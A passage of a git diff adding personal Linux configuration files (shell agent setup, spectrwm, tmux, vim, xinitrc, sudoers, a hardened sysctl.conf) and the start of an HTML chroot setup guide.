+export GPG_AGENT_INFO  # the env file does not contain the export statement
+export SSH_AUTH_SOCK   # enable gpg-agent for ssh
+
+export GPGKEY=XXXXXXXX
+
+# ssh-agent to ask only ounce for password
+SSH_ENV="$HOME/.ssh/environment"
+function start_agent {
+    echo "Initialising new SSH agent..."
+    /usr/bin/ssh-agent | sed 's/^echo/#echo/' > "${SSH_ENV}"
+    echo succeeded
+    chmod 600 "${SSH_ENV}"
+    . "${SSH_ENV}" > /dev/null
+    # KEY_NAME with default key to load
+    /usr/bin/ssh-add ~/.ssh/KEY_NAME;
+}
+
+# Source SSH settings, if applicable
+if [ -f "${SSH_ENV}" ]; then
+    . "${SSH_ENV}" > /dev/null
+    #ps ${SSH_AGENT_PID} doesn't work under cywgin
+    ps -ef | grep ${SSH_AGENT_PID} | grep ssh-agent$ > /dev/null || {
+        start_agent;
+    }
+else
+    start_agent;
+fi
+
+# Weston
+if test -z "${XDG_RUNTIME_DIR}"; then
+    export XDG_RUNTIME_DIR=/tmp/${UID}-runtime-dir
+    if ! test -d "${XDG_RUNTIME_DIR}"; then
+        mkdir "${XDG_RUNTIME_DIR}"
+        chmod 0700 "${XDG_RUNTIME_DIR}"
+    fi
+fi
diff --git a/linux/conf/skel/.spectrwm.conf b/linux/conf/skel/.spectrwm.conf
new file mode 100644
index 0000000..73f2a3a
--- /dev/null
+++ b/linux/conf/skel/.spectrwm.conf
@@ -0,0 +1,131 @@
+# PLEASE READ THE MAN PAGE BEFORE EDITING THIS FILE!
+# https://htmlpreview.github.io/?https://github.com/conformal/spectrwm/blob/master/spectrwm.html
+# NOTE: all rgb color values in this file are in hex! see XQueryColor for examples
+
+# workspace_limit	= 22
+# focus_mode		= default
+# focus_close		= previous
+# focus_close_wrap	= 1
+# focus_default		= last
+# spawn_position		= next
+# workspace_clamp	= 1
+# warp_focus		= 1
+# warp_pointer		= 1
+
+# Window Decoration
+# border_width		= 1
+# color_focus		= red
+# color_focus_maximized	= yellow
+# color_unfocus		= rgb:88/88/88
+# color_unfocus_maximized	= rgb:88/88/00
+# region_padding	= 0
+# tile_gap		= 0
+
+# Region containment
+# Distance window must be dragged/resized beyond the region edge before it is
+# allowed outside the region.
+# boundary_width 		= 50
+
+# Remove window border when bar is disabled and there is only one window in workspace
+# disable_border		= 1
+
+# Bar Settings
+# bar_enabled		= 1
+# bar_border_width	= 1
+# bar_border[1]		= rgb:00/80/80
+# bar_border_unfocus[1]	= rgb:00/40/40
+# bar_color[1]		= black
+# bar_color_selected[1]	= rgb:00/80/80
+# bar_font_color[1]	= rgb:a0/a0/a0
+# bar_font_color_selected	= black
+# bar_font		= -*-terminus-medium-*-*-*-*-*-*-*-*-*-*-*
+bar_font		= bar_font = Terminus:pixelsize=14:antialias=true
+# bar_action		= baraction.sh
+# bar_justify		= left
+# bar_format		= +N:+I +S <+D>+4<%a %b %d %R %Z %Y+8<+A+4<+V
+# workspace_indicator	= listcurrent,listactive,markcurrent,printnames
+# bar_at_bottom		= 1
+# stack_enabled		= 1
+# clock_enabled		= 1
+# clock_format		= %a %b %d %R %Z %Y
+# iconic_enabled	= 0
+# maximize_hide_bar	= 0
+# window_class_enabled	= 0
+# window_instance_enabled	= 0
+# window_name_enabled	= 0
+# verbose_layout		= 1
+# urgent_enabled		= 1
+
+# Dialog box size ratio when using TRANSSZ quirk; 0.3 < dialog_ratio <= 1.0
+# dialog_ratio		= 0.6
+
+# Split a non-RandR dual head setup into one region per monitor
+# (non-standard driver-based multihead is not seen by spectrwm)
+# region		= screen[1]:1280x1024+0+0
+# region		= screen[1]:1280x1024+1280+0
+
+# Launch applications in a workspace of choice
+# autorun		= ws[1]:xterm
+# autorun		= ws[2]:xombrero http://www.openbsd.org
+#autorun		= ws[1]:wicd-gtk
+autorun		= ws[1]:st -e tmux
+
+
+# Customize workspace layout at start
+# layout		= ws[1]:4:0:0:0:vertical
+# layout		= ws[2]:0:0:0:0:horizontal
+# layout		= ws[3]:0:0:0:0:fullscreen
+# layout		= ws[4]:4:0:0:0:vertical_flip
+# layout		= ws[5]:0:0:0:0:horizontal_flip
+
+# Set workspace name at start
+# name			= ws[1]:IRC
+# name			= ws[2]:Email
+# name			= ws[3]:Browse
+# name			= ws[10]:Music
+
+# Mod key, (Windows key is Mod4) (Apple key on OSX is Mod2)
+# modkey = Mod1
+
+# This allows you to include pre-defined key bindings for your keyboard layout.
+# keyboard_mapping = ~/.spectrwm_us.conf
+
+# PROGRAMS
+
+# Validated default programs:
+program[lock]		= slock
+program[term]		= st
+# program[menu]		= dmenu_run $dmenu_bottom -fn $bar_font -nb $bar_color -nf $bar_font_color -sb $bar_color_selected -sf $bar_font_color_selected
+# program[search]	= dmenu $dmenu_bottom -i -fn $bar_font -nb $bar_color -nf $bar_font_color -sb $bar_color_selected -sf $bar_font_color_selected
+# program[name_workspace]	= dmenu $dmenu_bottom -p Workspace -fn $bar_font -nb $bar_color -nf $bar_font_color -sb $bar_color_selected -sf $bar_font_color_selected
+
+# To disable validation of the above, free the respective binding(s):
+# bind[]		= MOD+Shift+Delete	# disable lock
+# bind[]		= MOD+Shift+Return	# disable term
+# bind[]		= MOD+p			# disable menu
+
+# Optional default programs that will only be validated if you override:
+# program[screenshot_all]	= screenshot.sh full	# optional
+# program[screenshot_wind]	= screenshot.sh window	# optional
+# program[initscr]	= initscreen.sh			# optional
+
+# EXAMPLE: Define 'firefox' action and bind to key.
+# program[firefox]	= firefox http://spectrwm.org/
+# bind[firefox]		= MOD+Shift+b
+
+# QUIRKS
+# Default quirks, remove with: quirk[class:name] = NONE
+# quirk[MPlayer:xv]			= FLOAT + FULLSCREEN + FOCUSPREV
+# quirk[OpenOffice.org 2.4:VCLSalFrame]	= FLOAT
+# quirk[OpenOffice.org 3.0:VCLSalFrame]	= FLOAT
+# quirk[OpenOffice.org 3.1:VCLSalFrame]	= FLOAT
+# quirk[Firefox-bin:firefox-bin]		= TRANSSZ
+# quirk[Firefox:Dialog]			= FLOAT
+# quirk[Gimp:gimp]			= FLOAT + ANYWHERE
+# quirk[XTerm:xterm]			= XTERM_FONTADJ
+# quirk[xine:Xine Window]			= FLOAT + ANYWHERE
+# quirk[Xitk:Xitk Combo]			= FLOAT + ANYWHERE
+# quirk[xine:xine Panel]			= FLOAT + ANYWHERE
+# quirk[Xitk:Xine Window]			= FLOAT + ANYWHERE
+# quirk[xine:xine Video Fullscreen Window] = FULLSCREEN + FLOAT
+# quirk[pcb:pcb]				= FLOAT
diff --git a/linux/conf/skel/.tmux.conf b/linux/conf/skel/.tmux.conf
new file mode 100644
index 0000000..ee127e8
--- /dev/null
+++ b/linux/conf/skel/.tmux.conf
@@ -0,0 +1,27 @@
+set -g default-terminal "screen-256color"
+
+set-window-option -g mode-keys vi
+bind-key -T copy-mode-vi 'v' send-keys -X begin-selection
+bind-key -T copy-mode-vi 'y' send-keys -X copy-selection-and-cancel
+
+
+# Vim style
+# copy tmux's selection buffer into the primary X selection with PREFIX+CTRL+Y
+bind-key u run "tmux save-buffer - | xsel -ib"
+# copy primary X selection into tmux's selection buffer with PREFIX+CTRL+P
+bind-key e run "xsel -ob | tmux load-buffer -"
+
+set-option -g set-titles on
+set-option -g set-titles-string '#S> #I.#P #W'
+
+set -g visual-activity on
+set -g monitor-activity on
+set -g visual-bell on
+set -g bell-action any
+
+## Join windows: <prefix> s, <prefix> j
+bind-key j command-prompt -p "join pane from:"  "join-pane -s '%%'"
+bind-key s command-prompt -p "send pane to:"  "join-pane -t '%%'"
+
+# Torn on mouse
+set -g mouse on
diff --git a/linux/conf/skel/.vim/backup/.gitignore b/linux/conf/skel/.vim/backup/.gitignore
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/linux/conf/skel/.vim/backup/.gitignore
diff --git a/linux/conf/skel/.vim/colors/wombat256mod.vim b/linux/conf/skel/.vim/colors/wombat256mod.vim
new file mode 100644
index 0000000..1137eb8
--- /dev/null
+++ b/linux/conf/skel/.vim/colors/wombat256mod.vim
@@ -0,0 +1,96 @@
+" Vim color file
+" Original Maintainer:  Lars H. Nielsen (dengmao@gmail.com)
+" Last Change:  2010-07-23
+"
+" Modified version of wombat for 256-color terminals by
+"   David Liang (bmdavll@gmail.com)
+" based on version by
+"   Danila Bespalov (danila.bespalov@gmail.com)
+
+set background=dark
+
+if version > 580
+	hi clear
+	if exists("syntax_on")
+		syntax reset
+	endif
+endif
+
+let colors_name = "wombat256mod"
+
+
+" General colors
+hi Normal		ctermfg=252		ctermbg=234		cterm=none		guifg=#e3e0d7	guibg=#242424	gui=none
+hi Cursor		ctermfg=234		ctermbg=228		cterm=none		guifg=#242424	guibg=#eae788	gui=none
+hi Visual		ctermfg=251		ctermbg=239		cterm=none		guifg=#c3c6ca	guibg=#554d4b	gui=none
+hi VisualNOS	ctermfg=251		ctermbg=236		cterm=none		guifg=#c3c6ca	guibg=#303030	gui=none
+hi Search		ctermfg=177		ctermbg=241		cterm=none		guifg=#d787ff	guibg=#636066	gui=none
+hi Folded		ctermfg=103		ctermbg=237		cterm=none		guifg=#a0a8b0	guibg=#3a4046	gui=none
+hi Title		ctermfg=230						cterm=bold		guifg=#ffffd7					gui=bold
+hi StatusLine	ctermfg=230		ctermbg=238		cterm=none		guifg=#ffffd7	guibg=#444444	gui=italic
+hi VertSplit	ctermfg=238		ctermbg=238		cterm=none		guifg=#444444	guibg=#444444	gui=none
+hi StatusLineNC	ctermfg=241		ctermbg=238		cterm=none		guifg=#857b6f	guibg=#444444	gui=none
+hi LineNr		ctermfg=241		ctermbg=232		cterm=none		guifg=#857b6f	guibg=#080808	gui=none
+hi SpecialKey	ctermfg=241		ctermbg=235		cterm=none		guifg=#626262	guibg=#2b2b2b	gui=none
+hi WarningMsg	ctermfg=203										guifg=#ff5f55
+hi ErrorMsg		ctermfg=196		ctermbg=236		cterm=bold		guifg=#ff2026	guibg=#3a3a3a	gui=bold
+
+" Vim >= 7.0 specific colors
+if version >= 700
+hi CursorLine					ctermbg=236		cterm=none						guibg=#32322f
+hi MatchParen	ctermfg=228		ctermbg=101		cterm=bold		guifg=#eae788	guibg=#857b6f	gui=bold
+hi Pmenu		ctermfg=230		ctermbg=238						guifg=#ffffd7	guibg=#444444
+hi PmenuSel		ctermfg=232		ctermbg=192						guifg=#080808	guibg=#cae982
+endif
+
+" Diff highlighting
+hi DiffAdd						ctermbg=17										guibg=#2a0d6a
+hi DiffDelete	ctermfg=234		ctermbg=60		cterm=none		guifg=#242424	guibg=#3e3969	gui=none
+hi DiffText						ctermbg=53		cterm=none						guibg=#73186e	gui=none
+hi DiffChange					ctermbg=237										guibg=#382a37
+
+"hi CursorIM
+"hi Directory
+"hi IncSearch
+"hi Menu
+"hi ModeMsg
+"hi MoreMsg
+"hi PmenuSbar
+"hi PmenuThumb
+"hi Question
+"hi Scrollbar
+"hi SignColumn
+"hi SpellBad
+"hi SpellCap
+"hi SpellLocal
+"hi SpellRare
+"hi TabLine
+"hi TabLineFill
+"hi TabLineSel
+"hi Tooltip
+"hi User1
+"hi User9
+"hi WildMenu
+
+
+" Syntax highlighting
+hi Keyword		ctermfg=111		cterm=none		guifg=#88b8f6	gui=none
+hi Statement	ctermfg=111		cterm=none		guifg=#88b8f6	gui=none
+hi Constant		ctermfg=173		cterm=none		guifg=#e5786d	gui=none
+hi Number		ctermfg=173		cterm=none		guifg=#e5786d	gui=none
+hi PreProc		ctermfg=173		cterm=none		guifg=#e5786d	gui=none
+hi Function		ctermfg=192		cterm=none		guifg=#cae982	gui=none
+hi Identifier	ctermfg=192		cterm=none		guifg=#cae982	gui=none
+hi Type			ctermfg=186		cterm=none		guifg=#d4d987	gui=none
+hi Special		ctermfg=229		cterm=none		guifg=#eadead	gui=none
+hi String		ctermfg=113		cterm=none		guifg=#95e454	gui=italic
+hi Comment		ctermfg=246		cterm=none		guifg=#9c998e	gui=italic
+hi Todo			ctermfg=101		cterm=none		guifg=#857b6f	gui=italic
+
+
+" Links
+hi! link FoldColumn		Folded
+hi! link CursorColumn	CursorLine
+hi! link NonText		LineNr
+
+" vim:set ts=4 sw=4 noet:
diff --git a/linux/conf/skel/.vim/swap/.gitignore b/linux/conf/skel/.vim/swap/.gitignore
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/linux/conf/skel/.vim/swap/.gitignore
diff --git a/linux/conf/skel/.vim/undodir/.gitignore b/linux/conf/skel/.vim/undodir/.gitignore
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/linux/conf/skel/.vim/undodir/.gitignore
diff --git a/linux/conf/skel/.vim/views/.gitignore b/linux/conf/skel/.vim/views/.gitignore
new file mode 100644
index 0000000..e69de29
--- /dev/null
+++ b/linux/conf/skel/.vim/views/.gitignore
diff --git a/linux/conf/skel/.vimrc b/linux/conf/skel/.vimrc
new file mode 100644
index 0000000..fb4445f
--- /dev/null
+++ b/linux/conf/skel/.vimrc
@@ -0,0 +1,156 @@
+" Use Vim settings, rather than Vi settings (much better!).
+" This must be first, because it changes other options as a side effect.
+set nocompatible
+
+"" allow backspacing over everything in insert mode
+"set backspace=indent,eol,start
+"
+if has("vms")
+  set nobackup		" do not keep a backup file, use versions instead
+else
+  set backup		" keep a backup file (restore to previous version)
+  set undofile		" keep an undo file (undo changes after closing)
+endif
+
+set history=50		" keep 50 lines of command line history
+set ruler		" show the cursor position all the time
+set showcmd		" display incomplete commands
+set incsearch		" do incremental searching
+
+"" For Win32 GUI: remove 't' flag from 'guioptions': no tearoff menu entries
+"" let &guioptions = substitute(&guioptions, "t", "", "g")
+"
+"" Don't use Ex mode, use Q for formatting
+"map Q gq
+"
+"" CTRL-U in insert mode deletes a lot.  Use CTRL-G u to first break undo,
+"" so that you can undo CTRL-U after inserting a line break.
+"inoremap <C-U> <C-G>u<C-U>
+"
+"" In many terminal emulators the mouse works just fine, thus enable it.
+"if has('mouse')
+"  set mouse=a
+"endif
+"
+"" Switch syntax highlighting on, when the terminal has colors
+"" Also switch on highlighting the last used search pattern.
+
+" colorscheme desert
+set t_Co=256
+if &t_Co > 2 || has("gui_running")
+  syntax on
+  set hlsearch
+  set background=dark
+  colorscheme wombat256mod
+  " colorscheme desert
+  :hi SpellBad ctermfg=Black guifg=Black
+endif
+
+
+"" Only do this part when compiled with support for autocommands.
+if has("autocmd")
+"
+"  " Enable file type detection.
+"  " Use the default filetype settings, so that mail gets 'tw' set to 72,
+"  " 'cindent' is on in C files, etc.
+"  " Also load indent files, to automatically do language-dependent indenting.
+  filetype plugin indent on
+"
+"  " Put these in an autocmd group, so that we can delete them easily.
+  augroup vimrcEx
+  au!
+"
+"  " For all text files set 'textwidth' to 78 characters.
+"  autocmd FileType text setlocal textwidth=78
+"
+"  " When editing a file, always jump to the last known cursor position.
+"  " Don't do it when the position is invalid or when inside an event handler
+"  " (happens when dropping a file on gvim).
+  autocmd BufReadPost *
+    \ if line("'\"") >= 1 && line("'\"") <= line("$") |
+    \   exe "normal! g`\"" |
+    \ endif
+
+  augroup END
+
+else
+  set autoindent		" always set autoindenting on
+
+endif " has("autocmd")
+
+"" Convenient command to see the difference between the current buffer and the
+"" file it was loaded from, thus the changes you made.
+"" Only define it when not defined already.
+"if !exists(":DiffOrig")
+"  command DiffOrig vert new | set bt=nofile | r ++edit # | 0d_ | diffthis
+"		  \ | wincmd p | diffthis
+"endif
+"
+"if has('langmap') && exists('+langnoremap')
+"  " Prevent that the langmap option applies to characters that result from a
+"  " mapping.  If unset (default), this may break plugins (but it's backward
+"  " compatible).
+"  set langnoremap
+"endif
+
+" Search down into subfolders
+" Provides tab-completion for all file-related tasks
+set path+=**
+
+" Display all matching files when we tab complete
+set wildmenu
+
+" Better file browsing
+let g:netrw_banner=0        " disable annoying banner
+let g:netrw_browse_split=4  " open in prior window
+let g:netrw_altv=1          " open splits to the right
+let g:netrw_liststyle=3     " tree view
+let g:netrw_list_hide=netrw_gitignore#Hide()
+let g:netrw_list_hide.=',\(^\|\s\s\)\zs\.\S\+'
+
+
+map <F2> :tabnew
+map <F3> :tabprevious<CR>
+map <F4> :tabnext<CR>
+"
+"" Show Line Numbers
+set relativenumber
+set complete=.,b,u,]
+set wildmode=longest,list:longest
+set completeopt=menu,preview
+"
+"" Directories
+set backupdir=~/.vim/backup
+set undodir=~/.vim/undodir
+set viewdir=~/.vim/views
+set directory=~/.vim/swap
+"
+"" Spell Check
+set spell spelllang=en_us
+"
+"" Strips whitespace
+nnoremap <leader>W :%s/\s\+$//<cr>:let @/=''<CR>
+"
+"" Whitespace fixes
+highlight ExtraWhitespace ctermbg=red guibg=red
+
+match ExtraWhitespace /\s\+$/
+autocmd BufWinEnter * match ExtraWhitespace /\s\+$/
+autocmd InsertEnter * match ExtraWhitespace /\s\+\%#\@<!$/
+autocmd InsertLeave * match ExtraWhitespace /\s\+$/
+autocmd BufWinLeave * call clearmatches()
+"
+"
+"" For tab characters that appear 4-spaces-wide
+"set tabstop=4
+"" If you're using actual tab character in your source code you probably also 
+"" want these settings (these are actually the defaults,set them defensively):
+"set softtabstop=0 noexpandtab
+"" Finally, if you want an indent to correspond to a single tab, you should also use:
+""set shiftwidth=4
+"" For indents that consist of 4 space characters but are entered with the tab key:
+set tabstop=8 softtabstop=0 expandtab shiftwidth=4 smarttab
+"set list
+"" set past gives problems with tabs
+"" set paste
+""
diff --git a/linux/conf/skel/.xinitrc b/linux/conf/skel/.xinitrc
new file mode 100644
index 0000000..379a315
--- /dev/null
+++ b/linux/conf/skel/.xinitrc
@@ -0,0 +1,13 @@
+#xrandr --output eDP1 --mode 1024x768
+#xrandr -s 1366x768
+#xrandr --dpi 73
+#xrandr --dpi 96
+#xgamma -gamma 0.8
+setxkbmap dvorak
+#syndaemon -d
+#
+## Start the window manager
+
+#exec openbox-session
+#exec start-mate
+exec spectrwm
diff --git a/linux/conf/sudoers b/linux/conf/sudoers
new file mode 100644
index 0000000..78146d7
--- /dev/null
+++ b/linux/conf/sudoers
@@ -0,0 +1,103 @@
+## sudoers file.
+##
+## This file MUST be edited with the 'visudo' command as root.
+## Failure to use 'visudo' may result in syntax or file permission errors
+## that prevent sudo from running.
+##
+## See the sudoers man page for the details on how to write a sudoers file.
+##
+
+##
+## Host alias specification
+##
+## Groups of machines. These may include host names (optionally with wildcards),
+## IP addresses, network numbers or netgroups.
+# Host_Alias	WEBSERVERS = www1, www2, www3
+
+##
+## User alias specification
+##
+## Groups of users.  These may consist of user names, uids, Unix groups,
+## or netgroups.
+# User_Alias	ADMINS = millert, dowdy, mikef
+
+##
+## Cmnd alias specification
+##
+## Groups of commands.  Often used to group related commands together.
+Cmnd_Alias	PROCESSES = /usr/bin/nice, /bin/kill, /usr/bin/renice, \
+ 			    /usr/bin/pkill, /usr/bin/top
+Cmnd_Alias	REBOOT = /sbin/halt, /sbin/reboot, /sbin/poweroff
+
+##
+## Defaults specification
+##
+Defaults editor=/usr/bin/rvim
+
+## You may wish to keep some of the following environment variables
+## when running commands via sudo.
+##
+## Locale settings
+Defaults env_keep += "LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET"
+##
+## Run X applications through sudo; HOME is used to find the
+## .Xauthority file.  Note that other programs use HOME to find   
+## configuration files and this may lead to privilege escalation!
+Defaults env_keep += "HOME"
+##
+## X11 resource path settings
+Defaults env_keep += "XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH"
+##
+## Desktop path settings
+Defaults env_keep += "QTDIR KDEDIR"
+##
+## Allow sudo-run commands to inherit the callers' ConsoleKit session
+Defaults env_keep += "XDG_SESSION_COOKIE"
+##
+## Uncomment to enable special input methods.  Care should be taken as
+## this may allow users to subvert the command being run via sudo.
+Defaults env_keep += "XMODIFIERS GTK_IM_MODULE QT_IM_MODULE QT_IM_SWITCHER"
+##
+## Uncomment to use a hard-coded PATH instead of the user's to find commands
+Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+##
+## Uncomment to send mail if the user does not enter the correct password.
+Defaults mail_badpass
+##
+## Uncomment to enable logging of a command's output, except for
+## sudoreplay and reboot.  Use sudoreplay to play back logged sessions.
+Defaults log_output
+Defaults!/usr/bin/sudoreplay !log_output
+Defaults!/usr/local/bin/sudoreplay !log_output
+Defaults!REBOOT !log_output
+
+##
+## Runas alias specification
+##
+
+##
+## User privilege specification
+##
+root ALL=(ALL) ALL
+
+## Uncomment to allow members of group wheel to execute any command
+%wheel ALL=(ALL) ALL
+
+## Same thing without a password
+# %wheel ALL=(ALL) NOPASSWD: ALL
+
+## Uncomment to allow members of group sudo to execute any command
+# %sudo	ALL=(ALL) ALL
+
+## Uncomment to allow any user to run sudo if they know the password
+## of the user they are running the command as (root by default).
+# Defaults targetpw  # Ask for the password of the target user
+# ALL ALL=(ALL) ALL  # WARNING: only use this together with 'Defaults targetpw'
+
+%users	ALL = NOPASSWD: REBOOT
+
+druid ALL=(postgres:postgres) NOPASSWD:ALL
+
+## Read drop-in files from /etc/sudoers.d
+## (the '#' here does not indicate a comment)
+#includedir /etc/sudoers.d
diff --git a/linux/conf/sysctl.conf b/linux/conf/sysctl.conf
new file mode 100644
index 0000000..7b14b46
--- /dev/null
+++ b/linux/conf/sysctl.conf
@@ -0,0 +1,160 @@
+#
+# /etc/sysctl.conf: configuration for system variables, see sysctl.conf(5)
+#
+
+#KERN_EMERG     "0"     Emergency messages, system is about to crash or is unstable     pr_emerg
+#KERN_ALERT     "1"     Something bad happened and action must be taken immediately     pr_alert
+#KERN_CRIT      "2"     A critical condition occurred like a serious hardware/software failure  pr_crit
+#KERN_ERR       "3"     An error condition, often used by drivers to indicate difficulties with the hardware    pr_err
+#KERN_WARNING   "4"     A warning, meaning nothing serious by itself but might indicate problems        pr_warning
+#KERN_NOTICE    "5"     Nothing serious, but notably nevertheless. Often used to report security events.        pr_notice
+#KERN_INFO      "6"     Informational message e.g. startup information at driver initialization         pr_info
+#KERN_DEBUG     "7"     Debug messages
+# current | default | minimum | boot-time-default
+kernel.printk = 7 1 1 4
+
+# set to 0 when profiling with apparmor
+kernel.printk_ratelimit=0
+
+kernel.randomize_va_space = 2
+
+# Shared Memory
+#kernel.shmmax = 500000000
+# Total allocated file handlers that can be allocated
+# fs.file-nr=
+vm.mmap_min_addr=65536
+
+# Allow for more PIDs (to reduce rollover problems); may break some programs 32768
+kernel.pid_max = 65536
+
+#Yama LSM by default
+kernel.yama.ptrace_scope = 1
+
+#
+# Filesystem Protections
+#
+
+# Optimization for port usefor LBs
+# Increase system file descriptor limit
+fs.file-max = 65535
+
+# Hide symbol addresses in /proc/kallsyms
+kernel.kptr_restrict = 2
+
+#
+# Network Protections
+#
+
+net.core.bpf_jit_enable = 0
+# harden all code
+net.core.bpf_jit_harden = 2
+
+# disable tunnels by default user space create
+# them as needed
+net.core.fb_tunnels_only_for_init_net = 1
+
+# Increase Linux auto tuning TCP buffer limits
+# min, default, and max number of bytes to use
+# set max to at least 4MB, or higher if you use very high BDP paths
+# Tcp Windows etc
+net.core.rmem_max = 8388608
+net.core.wmem_max = 8388608
+net.core.netdev_max_backlog = 5000
+net.ipv4.tcp_window_scaling = 1
+
+#A sequence of SACKs may be crafted such that one can trigger an integer overflow, leading to a kernel panic.
+net.ipv4.tcp_sack = 0
+
+# Both ports linux-blob and linux-libre don't build with ipv6
+# Disable ipv6
+net.ipv6.conf.all.disable_ipv6 = 1
+net.ipv6.conf.default.disable_ipv6 = 1
+net.ipv6.conf.lo.disable_ipv6 = 1
+
+# Tuen IPv6
+net.ipv6.conf.default.router_solicitations = 0
+net.ipv6.conf.default.accept_ra_rtr_pref = 0
+net.ipv6.conf.default.accept_ra_pinfo = 0
+net.ipv6.conf.default.accept_ra_defrtr = 0
+net.ipv6.conf.default.autoconf = 0
+net.ipv6.conf.default.dad_transmits = 0
+net.ipv6.conf.default.max_addresses = 0
+
+# Avoid a smurf attack, ping scanning
+net.ipv4.icmp_echo_ignore_broadcasts = 1
+
+# Turn on protection for bad icmp error messages
+net.ipv4.icmp_ignore_bogus_error_responses = 1
+
+# Turn on syncookies for SYN flood attack protection
+net.ipv4.tcp_syncookies = 1
+
+## protect against tcp time-wait assassination hazards
+## drop RST packets for sockets in the time-wait state
+## (not widely supported outside of linux, but conforms to RFC)
+net.ipv4.tcp_rfc1337 = 1
+
+## tcp timestamps
+## + protect against wrapping sequence numbers (at gigabit speeds)
+## + round trip time calculation implemented in TCP
+## - causes extra overhead and allows uptime detection by scanners like nmap
+## enable @ gigabit speeds
+net.ipv4.tcp_timestamps = 0
+#net.ipv4.tcp_timestamps = 1
+
+# Turn on and log spoofed, source routed, and redirect packets
+net.ipv4.conf.all.log_martians = 1
+net.ipv4.conf.default.log_martians = 1
+
+## ignore echo broadcast requests to prevent being part of smurf attacks (default)
+net.ipv4.icmp_echo_ignore_broadcasts = 1
+
+## sets the kernels reverse path filtering mechanism to value 1(on)
+## will do source validation of the packet's recieved from all the interfaces on the machine
+## protects from attackers that are using ip spoofing methods to do harm
+net.ipv4.conf.all.rp_filter = 1
+net.ipv4.conf.default.rp_filter = 1
+#net.ipv6.conf.default.rp_filter = 1
+#net.ipv6.conf.all.rp_filter = 1
+
+
+# Make sure no one can alter the routing tables
+# Act as a router, necessary for Access Point
+net.ipv4.conf.all.accept_redirects = 0
+net.ipv4.conf.default.accept_redirects = 0
+net.ipv4.conf.all.secure_redirects = 0
+net.ipv4.conf.default.secure_redirects = 0
+# No source routed packets here
+# Discard packets with source routes, ip spoofing
+net.ipv4.conf.all.accept_source_route = 0
+net.ipv4.conf.default.accept_source_route = 0
+
+
+net.ipv4.conf.all.send_redirects = 0
+net.ipv4.conf.default.send_redirects = 0
+
+net.ipv4.ip_forward = 0
+
+# Increase system IP port limits
+net.ipv4.ip_local_port_range = 2000 65000
+
+# Increase TCP max buffer size setable using setsockopt()
+net.ipv4.tcp_rmem = 4096 87380 8388608
+net.ipv4.tcp_wmem = 4096 87380 8388608
+
+# Disable proxy_arp
+net.ipv4.conf.default.proxy_arp = 0
+net.ipv4.conf.all.proxy_arp = 0
+
+# Disable bootp_relay
+net.ipv4.conf.default.bootp_relay = 0
+net.ipv4.conf.all.bootp_relay = 0
+
+# Decrease TCP fin timeout
+net.ipv4.tcp_fin_timeout = 30
+# Decrease TCP keep alive time
+net.ipv4.tcp_keepalive_time = 1800
+# Sen SynAck retries to 3
+net.ipv4.tcp_synack_retries = 3
+
+# End of file
diff --git a/linux/configure.html b/linux/configure.html
new file mode 100644
index 0000000..2e72c90
--- /dev/null
+++ b/linux/configure.html
@@ -0,0 +1,283 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>1.2. Configure</title>
+    </head>
+    <body>
+
+        <a href="index.html">GNU/Linux Index</a>
+
+        <h1 id="chroot">1.2. Configure</h1>
+
+        <p>If you don't mounted chroot follow this
+        steps from <a href="install.html">install</a>;</p>
+
+        <pre>
+        $ export CHROOT=/mnt
+        </pre>
+
+        <pre>
+        $ export BLK_EFI=/dev/sda2
+        $ export BLK_BOOT=/dev/sda3
+        $ export BLK_ROOT=/dev/vg_system/lv_root
+        $ export BLK_VAR=/dev/vg_system/lv_var
+
+        $ export BLK_HOME=/dev/vg_system/lv_home
+
+        $ sudo mount $BLK_BOOT $CHROOT/boot
+        $ sudo mount $BLK_EFI $CHROOT/boot/efi
+        $ sudo mount $BLK_VAR $CHROOT/var
+        $ sudo mount $BLK_HOME $CHROOT/home
+        </pre>
+
+        <p>If using separate /usr partition;</p>
+        <pre>
+        $ export BLK_USR=/dev/vg_system/lv_usr
+        $ sudo mount $BLK_USR $CHROOT/usr
+        </pre>
+
+
+        <p>Now you can chroot;</p>
+
+        <pre>
+        $ sudo chroot $CHROOT /usr/bin/env -i \
+          HOME=/root TERM="$TERM" PS1='\u:\w\$ ' \
+          PATH=/bin:/usr/bin:/sbin:/usr/sbin \
+          /bin/bash --login
+        </pre>
+
+        <h2 id="hostname">1.2.1. Set hostname and hosts</h2>
+
+        <p>Give it a name, this example we will call it machine;</p>
+
+        <pre>
+        # hostname machine
+        </pre>
+
+        <p>Edit /etc/hosts to contain your hostname and FQDN,
+        this example uses machine.example and machine.example.org sub-domain from
+        <a href="http://freedns.afraid.org">afraid.org</a> pointing
+        to 10.0.0.1 ip;</p>
+
+        <pre>
+        # IPv4
+        127.0.0.1	localhost.localdomain localhost
+        127.0.0.1       machine.example machine
+
+        #&lt;ip-address&gt;	&lt;hostname.domain.org&gt;	&lt;aliases&gt;
+        10.0.0.1                machine.example.org
+
+        # IPv6
+        #::1		ip6-localhost	ip6-loopback
+        #fe00::0	ip6-localnet
+        #ff00::0	ip6-mcastprefix
+        #ff02::1	ip6-allnodes
+        #ff02::2	ip6-allrouters
+        #ff02::3	ip6-allhosts
+
+        # End of file
+        </pre>
+
+        <p>Checkup;</p>
+
+        <pre>
+        $ hostname
+        machine
+        $ hostname -f
+        machine.example
+        </pre>
+
+        <h2 id="time">1.2.2. Set timezone</h2>
+
+        <p>Setup timezone;</p>
+
+        <pre>
+        # tzselect
+        Please identify a location so that time zone rules can be set correctly.
+        Please select a continent, ocean, "coord", or "TZ".
+         1) Africa
+         2) Americas
+         3) Antarctica
+         4) Asia
+         5) Atlantic Ocean
+         6) Australia
+         7) Europe
+         8) Indian Ocean
+         9) Pacific Ocean
+        10) coord - I want to use geographical coordinates.
+        11) TZ - I want to specify the time zone using the Posix TZ format.
+        #? 7
+
+        Please select a country whose clocks agree with yours.
+         1) ?land Islands         18) Greece                35) Norway
+         2) Albania               19) Guernsey              36) Poland
+         3) Andorra               20) Hungary               37) Portugal
+         4) Austria               21) Ireland               38) Romania
+         5) Belarus               22) Isle of Man           39) Russia
+         6) Belgium               23) Italy                 40) San Marino
